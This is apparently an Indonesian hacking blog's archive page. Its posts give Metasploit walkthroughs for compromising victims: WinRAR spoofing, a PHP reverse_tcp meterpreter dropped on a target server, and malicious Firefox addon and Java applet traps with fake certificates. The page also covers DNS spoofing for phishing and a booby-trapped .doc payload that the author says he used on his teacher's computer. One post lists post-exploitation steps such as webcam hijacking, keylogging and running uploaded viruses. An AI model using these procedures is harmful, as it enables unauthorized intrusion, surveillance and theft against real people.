Tampilkan postingan dengan label Backtrack Tool's. Tampilkan semua postingan
Tampilkan postingan dengan label Backtrack Tool's. Tampilkan semua postingan

Sabtu, 27 September 2014

Install Linux Debian di Android ( ARM )

Lama banget,aku udah jarang posting ^ ^

hari ini aku mau share, cara install LinuxARM di hp Android..
Kalo biasa nya kita Install android di Linux. skarang kita beda ^ ^

Mungkin yg pernah main Raspberry Pi, tau ya apa itu ARM Processor Architecture

Selain di MiniPC , Nano-ITX , Pico-ITX.
di Handphone Jaman skarang juga sudah bnyak yang mengunakan ARM Processor

kita akan menginstall LinuxARM ini
hanya dengan script installer 3.7mb


Hal yang perlu di perhatikan
- Rooted Acces
- Kernel supports mounting loop disks
- Kernel supports the ext2, ext3, or ext4 file systems
- CPU architecture  ARM (little endian) or i386 (ia-32 bit)
- 128 Mb of RAM atau lebih
- 512 Mb of free space on SD card
- Internet connection ( Kalo bisa yg cepet :p )
- Terminal app installed

WARNING: This stuff is checked on different hardware.
The kit should run with stock factory firmware, but customized ROMs should work also. Nevertheless: root access always includes the chance to do something very fatal to your device. Always watch, read and dig the error messages (if any) and re-think twice before doing something nasty.

Ok, Lets go..
Pertama kita download dulu script installer nya ( 3.71Mb )
Download
Pasti bingung, kok file nya jpeg ? Jangan Kaget :p

lanjut dengen meng'execute file tadi


Setelah proses Extracting selsai, akan ada output macam ini


Disana ada pilihankan ? ane pilih 0l ( 0+L )
arti nya install loop file nya 512mb, dan OS nya Ubuntu Lucid
saat prosses pembuatan file loop. itu lama banget
sebenernya tergantung dari kecepatan Sdcard yg kalian pakai


Ok, Next, Creating filesystem, disarankan berada di daerah yg terjangkau WiFi ^ ^

Setelah hal diatas selsai, akan ada output macam ini..

Sampai sini,hampir selsai
*Perhatikan Tulisan yg dipaling bawah, anda diminta untuk melakukan mounting ke filesystem yg tadi anda buat untuk mengakses nya
ketik "deb" di terminal, dan kemudian "apt-get update"
kalau bisa sekalian di upgrade "apt-get upgrade"


Sampai Step ini..bisa dibilang selsai.

untuk keluar dari session linux itu, ketik aja "exit"
kemudian kita umount filesystem nya dengan "deb u"
jika ingin mengkases nya kembali, enter aja "deb"


cara install linux di android,dengan cara ini..asli stabil
ini bukti nya 


Untuk Tutorial Lengkap nya versi Video
Download disini

Ok, semoga berhasil ya install nya ;)
mohon komentar nya dibawah,untuk Testimonial



Share:

Rabu, 04 Juni 2014

WinRAR Filename Spoofing with Metasploit


Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..

http://www.exploit-db.com/exploits/32752/

Saya pun tertarik untuk mencoba nya ^ ^
Menurut gw ini cukup bagus ya,buat memanipulasi trap ( jebakan ) ke victim
bisa lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )

Requiment :
Metasploit v4.9.2  atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736


ok..mari kita coba
Open your metasploit console


msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]

msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport

Kita buat file nya dengan perintah "exploit"
file berada di directory /root/.msf4/local/



ok,next kita hanya tinggal kasih ke victim :)

Jalankan exploit multi handler

msf > use exploit/multi/handler

untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat



and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session

Share:

Senin, 02 Juni 2014

Fixed Failed to Connect to the Database Metasploit

Mungkin dari beberapa orang yg baru belajar Metasploit, pernah ngalamain error database metasploit seperti ini
Failed to connect to the database: could not connect to server: connection refused


Udah Jelas banget dari Pesan nya, Database nya gak connected :)

Ok, Bgini cara Fix nya
1. Pastikan service postgresql, kalian berjalan
2. cek file config database metasploit nya ( /opt/metasploit-4.4.0/config/database.yml )


Jalankan Service Postgresql nya.
$ service postgresql start

Masih ada error ??
bisa jadi itu karna masalah config dengan dengan database msf kalian,
dan ini cara untuk setup new database msf dengan postgresql

Root@Ganteng:# su - postgres
postgres@localhost~$ createuser [Nama User] -P
postgres@localhost~$ [Enter password]
postgres@localhost~$ Validate password
postgres@localhost~$ Shall the new role be a superuser? n
postgres@localhost~$ Shall the new role be allowed to create databases? n
postgres@localhost~$ Shall the new role be allowed to create new roles? n
postgres@localhost~$ createdb --owner=[Nama User] [Name_Database]
postgres@localhost~$ exit

setelah membuat user di posgresql
next kita membuat file configure database Metasploiut nya.
kalian bisa liat contoh file nya di
"/usr/share/metasploit-framework/config/database.yml.example"

edit aja langsung itu file example nya..


Input data-data nya sesuai yg tadi dibuat di postgresql
Kemudia save

dan rename dari "database.yml.example" to "database.yml"



Ok,Next... Buka msfconsole



Jika masih belum connect,coba dengan meng'connectkan langsung di Metasploit nya
msf > db_connect NamaUser:Passwd@127.0.0.1:5432/name_database



Done..
Share:

Rabu, 01 Januari 2014

Menambahkan Metasploit Modules




siapa yang tidak kenal metasploit..
tool satu ini sangat berguna banget di dunia security untuk melakukan Pentesting

di dalem metasploit ini,terdapat banyak sekali exploit-exploit yang bisa dibilang cukup mantap.
tapi bagaimana kalo version metasploit kita tidak update
atau kita ingin menambahkan module exploit buatan kita sendiri


oke,. pertama siapkan dulu module exploit yang ingin ditambahkan ke metasploit

kalian bisa download module disini
atau bikinan sendiri :p


bikin folder/directory pada  /root/.msf4/modules/



taruh disini Modules msf kalian
/root/.msf4/modules/exploit/tambahan/
**hanya saran

oke next,buka msfconsole
ketikan "reload_all"  pada msfconsole kalian
guna untuk me'refresh module-module msf kalian :D


jika sudah semua..,sekarang waktu nya untuk mencoba





oke..kita selasi :)
tak lupa saya mengucapkan "Selamat Tahun Baru 2014"
sampai ketemu di Postingan Selanjut nya


Share:

Senin, 30 September 2013

Dirbuster Directory Brute Force


DirBuster adalah tool yg digunakan untuk mem'brute force directory,pada suatu website


tool ini berguna sekali,untuk mempelajari struktur-struktur files yg berada di pada website target..
dengan meng'Craw files/Folder pada target,kita bisa memperlajari CMS apa yg target pakai.. atau mencari login page
Siapa tau juga,kita ketemu folder yg penting :v


Oke Langsung aja,buka directory dimana dirbuster berada
cd /pentest/web/dirb/

Jalankan dengan perintah
./dirb


cara pakai nya cukup mudah,
./dirb [url target]




kalian juga bisa mengunakan wordlist buatan sendiri
dengan mengunakan perintah
./dirb [url target] [letak Wordlist]

taruh file wordlist kalian di directory
/pentest/web/dirb/wordlists



Oke Sekian dari ane Clound
Share:

Jumat, 09 Agustus 2013

Steganografi Tutorial


hola..
kali ini ane mau share Tentang Steganografi

tapi sebelum nya saya mau ngucapin
Minal 'Aidin wal-Faizin,
mohon maaf kalo saya ada salah" kata selama ini :D


oke,.. kembali ke laptop
untuk yang belum tahu,.. apa itu Steganografi ?

Steganografi
adalah ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara. sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia.

biasa nya teknik ini digunakan untuk mengirim surat bersifat rahasia
para heker,agent,military mungkin mengunakan teknik ini untuk mengirim surat yang bersifat rahasia

Steganografi pertama dikenal oleh bangsa Yunani.
Herodatus, penguasa Yunani, mengirim pesan rahasia dengan menggunakan kepala budak atau prajurit sebagai media. Dalam hal ini, rambut budak dibotaki, lalu pesan rahasia ditulis pada kulit kepala budak. Ketika rambut budak tumbuh, budak tersebut diutus untuk membawa pesan rahasia di balik rambutnya.

segitu aja cerita Steganografi yang pernah ane baca :D


oke,.. let's kita beraksi
install aplikasi ini

$ apt-get install steghide

next.. kita ambil sebuah file dan pesan
masukan file dan pesan tersebut kedalam satu folder


oke sekarang kita coba memasukan pesan.txt ke dalam Clound.jpg
$ steghide embed -cf Clound.jpg -ef pesan.txt

$ Enter passphrase:
untuk menjaga kerahasian,pesan juga di proteksi password
jadi untuk meng extract pesan tersebut di butuhkan password

sekarang kita udah selasai memasukan pesan tersebut kedalam file
bisa di lihat di screenshot di bawah ini



oh iya..pasti kalian juga bertanya
bagaimana cara membaca atau extract pesan tersebut ?

cara meng'extract nya cukup mudah,bisa mengunakan syntax dibawah ini

$ steghide extract -sf Clound.jpg

bisa dilihat di foto di bawah..
sebelum nya tidak ada file pesan.txt
tetapi setelah di extract keluar lah file pesan.txt



gimana mudah bukan ?
oke sekian dari saya Clound

Share:

Senin, 29 Juli 2013

Rooting Server with Metasploit Backconnect


apa kabar nya nih para pembaca..

oke,kali ini
ane mau share Cara Rooting Server dengan Metasploit,
dengan mengunakan php meterpreter

pertama kita buat terlebih dahulu payload php reverse_tcp,bagaima cara buat nya..
ketik aja di terminal :

$ msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6000 R > /root/Desktop/bekonek.php

oke,payload nya udah selsai dibuat dan berada di Desktop..
sekarang Upload itu Payload ke Server korban

anggap,saja kalian udah mengupload Bejak/Shell ke Server korban..
jadi bisa dengan mudah mengases file di server korban

jika sudah terUpload,
Jalankan exploit Multi handler..

> use exploit/multi/handler 
> set lhost 192.168.1.1
> set lport 6000
> set payload php/meterpreter/reverse_tcp
> exploit


jika exploit sudah di jalankan,kita hanya tinggal menjalankan Payload yg tadi di upload ke server korban

cukup dengan membuka melalui web browser..
melalui webbrowser dari kompi kalian dan akses ke server yang anda sudah upload payload

www.target.com/bekonek.php

dan server pun jatuh ke tangan kita



**Note : disini ane praktek di Jaringan Local,jadi IP nya 192.168.xx.xx
ini bisa juga di coba di IP public

oke,sekian dari ane..

Share:

Jumat, 12 Juli 2013

Metasploit In Actions


halo.. sore menjelang menjelang magrib nih,
masa pada kuat puasa nya ?

dari pada bosen nunggu magrib,mending nongkrong di blog ane :D

hari ini sebener nya ane bingung mau share apa..
tapi tread ini ane kasih judul Metasploit In Actions

hal apa aja sih yang bisa di lakukan kalo kita udah medapatkan stage Meterpreter..

di postingan ane sebelum nya..lebih bnyak tutor bagaimana cara mengexploit windows dan mendapat kan acces root nya
tapi gak di terangin lagi.. kalo udah dapet bisa di apaain lagi

nah,.kali ane mau share hal apa aja sih yg biasa ane lakuin kalo udah dapet acces pada korban

oke cekidot..

yang pertama..
kita bisa bajak Webcam
**klo korban punya webcam.. live streaming via web Browser
cek dlu si korban punya webcam gak..
> webcam_list
kalo tertanya ada.. langsung aja jalankan webcam nya
> run webcam


2.kedua,.. kita bisa Remote Desktop korban.. ini paling mantap
dengan menjalankan perintah
> run VNC


3. ambil alih shell/console..
dengan menjalankan perintah
> shell


4. Keyloger..
kita bisa mencatat semua ketukan Keyboar korban,
> keyscan_start  (untuk aktifin keyloger)
> keyscan_dump   (lihat hasil keyloger nya )


5.Download
> download [nanafile]

6. Upload..
Upload file ke kompi target,
ente bsa upload file .3gp,virus.. atau apa aja lah
> upload /root/nama.3gp  C:\Users\
   local lokasi file    |     tempat yg akan di upload

7. execute.. menjalankan program yg ada pada PC korban
nah in berguna bnget,abis upload virus tinggal di exec
> execute -f notepad.exe -t



8.kill prosses,
mungkin ini lawan dari exec,
cara dapetin prosses ID nya,di baca dlu prosses list nya
> kill [prosses ID]



9.Manage Prosses on target
nyambung dkit dari yg atas
> ps

10.migrate..
guna nya untuk pindah prosses..
misal,. ente masuk ke korban dari file bakdor.exe,..begitu itu bakdor.exe di exit,.. maka acces ente pun akan tertutup..
untuk mencegah nya,kita bisa pindah ke prosses lain nya
> migrate [Prosses ID]


terakhir..  Shutdown
kalo ane udah bosen,ane Shutdown tuh target
> shutdown


dah..kya nya itu aja yang biasa ane lakuin ^ ^
untuk lebih lengkap nya ente bisa mengunakan comment help
> ?

udah jam segini.. ane mau nyari makanan untuk buka dlu

salam dari ane Clound

Share:

Rabu, 10 Juli 2013

Exploit Windows with Firefox addons




halo semua,hari pertama bulan puasa.. apa kabar nih ?
Alhamdulillah,ane masih kuat untuk hari ini :D

kali ini ane mau share cara Exploit Windows dengan addons/Plugins Firefox Webbrowser
cara ini lumayan bagus kalau menurut ane,..

oke langsung aja cekidot...

jalankan Metasploit...

> use exploit/multi/browser/firefox_xpi_bootstrapped_addon

cek options yang harus kalian isi apa aja..


oke dahliat kan options nya,
di set sendiri aja om :v

next.. kalao udah semua di setting,jalankan exploit


dan ini tampilan saat korban mengakses jebakan kalian..





buat korban yakin dengan plugins kalian,agar terinstall di Firefox korban..
dan kalau sang korban memasang Plugins/addons kalian..
nah.. langsung dah kalian masuk ke stage Meterpreter



oke,sekian dari ane Clound A.K.A Muhammad Ridwan
ane mau ngucapin mohon maaf lahir batin..

bye.. sampai ketemu di postingan selanjut nya :D


Share:

Rabu, 03 Juli 2013

Changing Windows Password with Chntpw


oke,balik lagi sama ane Clound,
apa kabar semua nih ?

ane mau share tutorial cara reset password Administrator Windows
mungkin trick ini udah basi kali ya,karna udah banyak juga di internet


jadi kmaren itu ada temen ane yg dateng ke rumah,kata nya password laptop nya ada yg ganti..
ane langsung inget kalo di backtrack ini ada tool nama nya Chntpw.

jadi gak salah juga kan kita pelajarin lagi :) | apa lgi klo ada keperluan mendadak kaya temen ane ini

oke,langsung aja cekidot

pertama yg harus kita lakukan adalah mount partisi Windows nya,dan copy nama disk nya


next cari file "SAM"
file ini ada di directory /WINDOWS/system32/config/



kalo udah ketemu,
jalankan tool chntpw kalian :D

jalankan dengan syntax Seperti ini :
$  ./chntpw -i /media/883C2B473C2B301C/WINDOWS/system32/config/SAM



nah itu kan keluar pilihan, pilih 1 atau 9
pilih aja 1 Edit users data and Password



nah masukan nama user yang mau di ganti passwd nya..

simple kan ?

oke dah,sekian dari ane
Clound Carbelius

Share:

Rabu, 19 Juni 2013

Exploit with Java_Signed Applet

hola,ketemu lagi sama saya nih

kali ini ane mau share cara exploit dengan java signet
dengan catatan sang korban harus menginstall java..

sedikit info kegunaan Java :
salah satu nya untuk Membantu pembuatan program untuk dijalankan dalam browser Web dan layanan Web.
seperti virus scanner online,website can you run it,dan masih banyak lagi...


oke,kembali ke topik
cara exploit nya hampir sama dengan yg kemarin ane share ya itu shourcut shell
dengan mengirim file" exploit ke ip korban


tapi java signet ini lebih mantap lagi
saat korban mengklik url path jebakan kita
(ipheker.com/urlpart)
sedikit dengan soceng,agar menyakinkan korban agar mengallow koneksi java
 dan trick ini aman dari virus :D


bagaimana cara nya ? cekidot..

buka console metasploit kalian

> use exploit/multi/browser/java_signed_applet
> set payload windows/meterpreter/reverse_tcp
> show options
> set appletname clound_music  (kasih nama yang bisa meyakinkan korban)
> set certcn Adobe Flash Player
> set srvhost [IP ente]
> set srvport 80 [karna memakai web browser]
> set uripath music [ip.com/path]
> set lhost [ip ente]
> set lport 443
> exploit



nah klo exploit sudah di jalankan
sekarang kita bujuk korban untuk masuk ke perangkap kita

dan begitu korban mengexekusi jebakan kita
 langsung muncul jendela security Java,


berdoa aja agar korban mengkilk allow
dan kita masuk kita ke kompi korban deh :D



sekian dari saya
Clound


Share:

Senin, 17 Juni 2013

DnsSpoof with ettercap

halo :)
saya Clound,dan kali ini saya ingin share cara mesabotase domain di jaringan local dengan dnsspoof
contoh domain www.facebook.com,
anda bisa memindahkan domain ini ke IP local anda
penasaran cara nya ?

cekidot..
pertama kita harus mengedit file dns nya
nano /usr/local/share/ettercap/etter.dns

edit seperti gambar di bawah :



[domain] A [IP redirect]
*.domain.com  --> untuk sub domain

nah.. kalo sudah di setting file dns nya,save.. :D
saat nya kita beraksi dengan ettercap

ettercap -T -q -i [Network interface] -P dns_spoof -M arp // //


dan saat semua komputer yg berada satu jaringan dengan anda,
tidak bisa mengakses domain yg sudah anda spoof
dan dia akan ke redirect ke IP anda



*note
teknik seperti ini sangat bagus di gunakan untuk phising di jaringa local

oke thank's atas perhatian nya
Share:

Jumat, 14 Juni 2013

Payload With Ms.Word Document

halo semua...
thank's ya udah sering update di blog ane :D

ane mau curhat,sekalian share ilmu nih
waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya

dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama

idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v

dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mengengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..

dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok

begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru

sekian cerita dari saya Clound


tapi bagaimana cara membuat Payload berextension .doc
hampir lupa saya :3

ketik di msfconsole kalian :
> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/

jika sudah siap semua,langsung jalankan exploit multi_handler

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit



nah,tinggal tungguin aja korban menjalankan payload tersebut


tambahan sedikit,begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit

segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target :D


karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system
ok,thank's
Share:

Selasa, 11 Juni 2013

Exploit Windows without Backdoor


halo semua ketemu lagi sama saya si Clound yang tampan tiada tara \o/
seperti kmaren saya akan share cara exploit
gak tau kenapa,lagi hobby main metasploit..dan ketagihan stage meterpreter :v

kalau kemaren saya share cara exploit windows dengan backdoor yang tidak terdeksi virus oleh AV
dengan SET ( Social Enginering Toolkit ) Disini

kali ini saya akan share cara exploit windows tampa Backdoor
tapi mengunkan shourcut link yang di exec oleh Browser korban,
Bagaimana cara nya ?    langsung aja cekidot


buka metasploit kalian..

ketik di msfconsole kalian seperti berikut :

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set SRVHOST [Ip ente]
set LHOST  [ip ente]
set PAYLOAD windows/meterpreter/reverse_tcp


nah tinggal exploit dah,


disini,sang korban harus mengakes alamat IP anda dengan port 80..
yaitu mengunakan webBrowser



**lihat gambar di atas,
lihat terminal di sebelah kiri
 saat korban mengakses IP anda,saat itu juga dia mendownload shuorcut backdoor yang akan membuka stage meterpreter

tunggin aja sampe keluar tulisan
[*] Meterpreter session 1 opened

dan beginilah hasil nya om..


oke.. sekian dari saya clound :D
semua nya hanya untuk materi pembelajaran saja
not for crime,Peace



Share: